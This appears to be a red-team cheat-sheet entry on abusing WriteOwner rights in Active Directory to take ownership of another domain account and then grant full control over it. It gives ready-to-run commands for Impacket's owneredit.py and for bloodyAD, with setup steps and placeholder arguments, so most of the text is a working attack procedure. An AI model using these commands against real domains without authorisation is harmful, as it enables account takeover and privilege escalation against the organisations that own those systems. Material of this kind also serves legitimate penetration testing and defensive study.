PRIMARY CATEGORY → DACL ABUSE
Theory
This DACL abuse can be carried out during an assessment when an operator has compromised a domain account which has WriteOwner DACL over another domain account
Once the owner of the given account is set to the account controlled by the attacker, the adversary can add, delete or modify any existing ACE within the object’s ACL, thereby gaining complete control over that account as he can set a FullControl (GenericAll) ACL on the latter
Abuse - UNIX-like
Impacket’s Owneredit.py
owneredit.py -dc-ip '<DC_IP>' -new-owner '<CONTROLLED_ACCOUNT>' -target '<TARGET_ACCOUNT>' -action write '<DOMAIN>/<USER>:<PASSWD>'BloodyAD
Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txtUsage
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' set owner '<TARGET_ACCOUNT>' '<CONTROLLED_ACCOUNT>'